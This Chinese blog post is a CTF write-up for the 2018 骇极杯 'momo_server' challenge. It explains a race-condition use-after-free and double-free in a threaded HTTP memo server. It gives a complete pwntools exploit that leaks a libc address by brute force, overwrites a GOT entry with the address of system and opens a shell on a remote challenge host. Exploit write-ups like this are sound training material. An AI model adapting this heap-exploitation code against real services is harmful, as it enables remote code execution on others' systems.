骇极杯_2018_momo_server(条件竞争UAF)

最新推荐文章于 2024-08-01 20:49:47 发布
最新推荐文章于 2024-08-01 20:49:47 发布
阅读量928 收藏 2
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 UAF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/108587885
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

骇极杯_2018_momo_server(条件竞争UAF)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

Count功能开启了一个线程

该线程会异步进行堆的free操作,其中注意到free(ptr[i]->name)后,没有将name指针清零,并且该循环尾部会休眠1s。

结尾会将ptr指针清零

在add函数中,如果name已存在,那么仅更新count和flag。

因此,我们在ptr[i]被清零之前,通过add更新count和flag,这样,name就会被二次free,也就是存在条件竞争double free漏洞。

 

通过实验,发现在线程里调用free释放主线程里的堆后,只有当线程结束以后,堆chunk才会被放到主线程的arena里,并且不会放到tcache bin,而是直接放到其他bin里。因此,我们可以构造fastbin的double free。

Add功能中,malloc的大小是解码前的数据大小,而复制的大小则是解码后的字符串计算长度。因此,\x00数据进行URL编码,从而可以绕过第一次strlen计算的\0截断问题。

Echo功能可以用来泄露栈上的数据,但是本地栈和远程栈有些不一样,因此,我们猜测远程的数据为libc中的某个地址,然后通过多次枚举爆破,可以得到远程的libc地址。

爆破

#coding:utf8
from pwn import *
import urllib

libc = ELF('./libc-2.27.so')

#context.log_level = 'debug'

def add(content,count):
   payload = 'POST /add Connection: keep-alive\n\n'
   payload += 'memo=' + content + '&count=' + str(count)
   sh.sendline(payload)
   sh.recvuntil('{"status":"ok"}')

def delete():
   payload = 'POST /count Connection: keep-alive\n\n'
   sh.sendline(payload)
   sh.recvuntil('{"status":"ok"}')

def show():
   payload = 'GET /list Connection: keep-alive\n\n'
   sh.sendline(payload)
   sh.recvuntil('Content-Type: text/html')

def echo(content):
   payload = 'POST /echo Connection: keep-alive\n\n'
   payload += 'content=' + content
   sh.send(payload)

def exploit(x):
   echo('a'*0x38)
   sh.recvuntil('a'*0x38)
   offset = (x << 12) + 0x9d0
   libc_base = u64(sh.recvuntil('"}',drop = True).ljust(8,'\x00')) - offset

   if libc_base >> 40 != 0x7F:
      raise Exception('leak error!')
   system_addr = libc_base + libc.sym['system']
   print 'libc_base=',hex(libc_base)
   print 'system_addr=',hex(system_addr)

   add('a'*0x30,1)
   add('b'*0x30,1)
   add('c'*0x30,1)
   add('d'*0x40,3)
   #条件竞争UAF
   delete()
   sleep(2)

   show()
   sh.recvuntil('count</th></tr><tr><td></td><td>0</td></tr><tr><td>')
   name = sh.recvuntil('</td>',drop = True)
   heap_addr = u64(name.ljust(8,'\x00'))
   print 'heap_addr=',hex(heap_addr)
   #条件竞争double free
   add(name,1)
   fake_chunk_got = 0x000000000060306A
   #确保线程结束
   sleep(3)
   #通过URL编码,是的0x000000000060306A变成16进制字符串的形式,从而不会截断
   add(urllib.quote(p32(0x60306A).ljust(0x30, 'a')),0x100)
   add('a'*0x30,0x100)
   add('b'*0x30,0x100)

   payload = 'c'*0x16 + urllib.quote(p64(system_addr))
   payload = payload.ljust(0x30,'c')

   add(payload,0x100)
   sh.send('/bin/sh\x00')

   sh.interactive()

for x in range(0xFF):
   print 'x=',hex(x)
   while True:
      try:
         global sh
         sh = remote('node3.buuoj.cn',25344) #远程最终爆破出x = 0x11
         #sh = process('./2018_momo_server',env = {'LD_PRELOAD':'./libc-2.27.so'})
         exploit(x)
         break
      except Exception as e:
         print 'trying...'
         sh.close()

 

ha1vk
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 933
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
2018-骇极杯
Maxmalloc的博客
02-13 492
arm 第一次做arm,花了很多时间,希望整理的详细一点。 环境安装 首先需要安装qemu,和相应的依赖库 qemu sudo apt-get install qemu 依赖库 sudo apt-get install -y gcc-aarch64-linux-gun g++-aarch64-linux-gnu 合在一起安装不了的话就分开来安装 运行 qemu-aarch64 -g 1234 ...
【内核漏洞利用】WCTF 2018 klist—竞争UAF-pipe堆喷
panhewu9919的博客
09-11 1047
WCTF 2018 klist—竞争UAF-pipe堆喷 本题对了解和利用内核竞争漏洞很有帮助。 一、题目分析 题目模仿磁盘文件机制,可以自由申请、释放、读写堆块。提供read、write、ioctl三个功能。 堆块结构如下。flag—标志位,使用原子操作对其加减,操作前加1,操作后减1,当该位为0时,调用kfree释放;size—content大小;next指向下一个item。 --...
CTF文件上传 与 条件竞争上传
最新发布
2301_81556781的博客
08-01 428
htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。
linux kernel pwn学习之条件竞争(一)
seaaseesa的博客
03-04 1799
Linux kernel条件竞争 条件竞争发生在多线程多进程中,往往是因为没有对全局数据、函数进行加锁,导致多进程同时访问修改,使得数据与理想的不一致而引发漏洞。本节,我们从wctf2018-klist这题来分析一下条件竞争制造UAF的利用。 wctf2018-klist 首先,查看一下启动脚本,发现开启了smep机制,说明内核不能直接执行用户空间的代码 qemu-system-x86_...
2018年“骇极杯” web3 GOOD JOB writeup 两种解法
a3320315的博客
10-17 756
0x01 贴出源码 <?php //error_reporting(0); //$dir=md5("icq" . $_SERVER['REMOTE_ADDR']); $dir=md5("icq"); $sandbox = '/var/sandbox/' . $dir; @mkdir($sandbox); @chdir($sandbox); ...
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
fido-uaf-v1.0-ps-20171208-cn-pass.rar_IFAA_fido specification_中文
09-15
1.FIDO UAF 架构概览 v1.0.pdf 2.FIDO 术语表 v1.0.pdf 3.FIDO UAF 协议规范 v1.0.pdf 4.FIDO UAF 应用API和传输绑定规范 v1.0.pdf 5.FIDO UAF 认证器控制命令 v1.0.pdf 6.FIDO UAF 认证器特定模块API v1.0.pdf 7....
KW-UAF42-模块用户手册-简易_V1.1.pdf
03-22
根据提供的文件信息,我们可以深入解析并提取出与KW-UAF42模块相关的多个知识点: ### 1. KW-UAF42模块概述 KW-UAF42模块是由康威科技开发的一种有源滤波器模块。该模块具备低通、高通、带通滤波功能,用户可以...
2018上海CTF骇极杯”逆向WP
11-12
2018上海CTF骇极杯”逆向WP2018上海CTF骇极杯”逆向WP
网络安全-条件竞争(《CTF特训营》第7章复现)_bp进行条件竞争(1)
2401_84254087的博客
05-02 40
条件竞争,发生在多个线程或进程在读写一个共享数据时,结果依赖于他们执行的相对时间的情形。
WEB-CTF 条件竞争
iamsongyu的博客
10-24 6226
如何来形容这个类型的问题呢,就像是幼儿园发糖吃,每个人只能拿一块,但是如果你跟别人一起再拿一次老师也没办法分辨,毕竟一群小朋友老师也没办法分辨手和对应的人。 关于部分的Burpsuite使用的知识,在前面的https://blog.csdn.net/iamsongyu/article/details/82989478中已经讲了,就不在赘述   这是一个好文章,从上边摘抄和借鉴了不少 htt...
CTF条件竞争
夏日 の blog
02-10 2644
简介 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。 个人理解 通俗的来讲就是假设程序同时处理存钱和取钱,当取钱"速度"大于存钱时,可能就会出现取钱后程序还未来得及将金额减少,程序又立马处理存钱,由此产生非预期的结果。 竞争...
whctf2017_note_sys(多线程条件竞争漏洞)
seaaseesa的博客
06-12 571
whctf2017_note_sys(多线程条件竞争漏洞) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能另启了一个线程 函数里休眠了2s,在休眠之前,end_ptr减去了8 在add函数里,取end_ptr,然后往其指向的地方写一个堆地址。 由此,我们可以多次调用delete,每次end_ptr都会减去8并且休眠2s再做判断,这就存在条件竞争,我们可以在判断之前让end_ptr指向got表,然后add的时候就能往got表里写一个堆地址,我们在堆里布下s
小结一下Web的条件竞争的题目
0verWatch的博客
03-10 5632
前言 最近在做我们学校平台的一个题目的时候,突然发现了一个新知识。。。。。可能我是菜鸡吧,大佬们请忽视 正文 这个知识点叫条件竞争。。。 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。 简单点理解就是在你要做一件事情的时候用很快的速度插了个队并做了另外一件事,一旦这件事...
浅谈条件竞争漏洞及利用
crispr的博客
02-15 1588
浅谈条件竞争漏洞及利用 0x01 前言 最近看到了两三个关于条件竞争的例子,正好hgame上有一个类似的题目,这里就直接把这个知识点弄得明白点,因此就有了浅谈条件竞争漏洞。。 0x02 正言 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。 前提: 竞争条件发生在多个线程同时访问同一...
CTF wp 2018骇极杯”全国大学生网络安全邀请赛暨第四届上海市大学生网络安全大赛线上赛 writeup
Thea_1207的博客
11-05 3849
为0x00 签到题操作内容: | 登陆比赛界面上去看到签到题,一般情况下签到题是没有难度的题目给定一串字符MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q Base32 一闪而过,比的就是手速,解码拿到flag。 FLAG 值: 标志{35222d30-439e-4afb-91F4-abebc73fe0...
UAF:统一企业架构框架详解
"UAF-for-Incose" Unified Architecture Framework(UAF)是一种企业架构框架,它是Unified Profile for DoDAF and MoDAF (UPDM)的下一代版本,有时也被称为UPDM 3。UAF的设计目的是为类似于DoDAF(Department of ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值